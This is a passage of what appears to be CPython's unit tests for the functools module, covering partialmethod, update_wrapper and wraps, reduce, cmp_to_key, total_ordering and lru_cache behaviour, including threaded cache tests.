def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod(func=capture, a=1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestCache:
# This tests that the pass-through is working as designed.
# The underlying functionality is tested in TestLRU.
def test_cache(self):
@self.module.cache
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
class TestLRU:
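    # Shared lru_cache tests; self.module is expected to be the functools
    # implementation under test (pure-Python or C-accelerated).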
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
        # the user function call had already modified the cache
        # (this arises in recursive calls and in multi-threading).
        # This caused the cache to have orphan links not referenced
        # by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
        # LRU cache guarantees that it will call __hash__ at most
        # once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
        # Test to make sure the LRU cache code isn't thrown off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with threading_helper.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
                # XXX: Why can these be unequal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with threading_helper.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with threading_helper.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
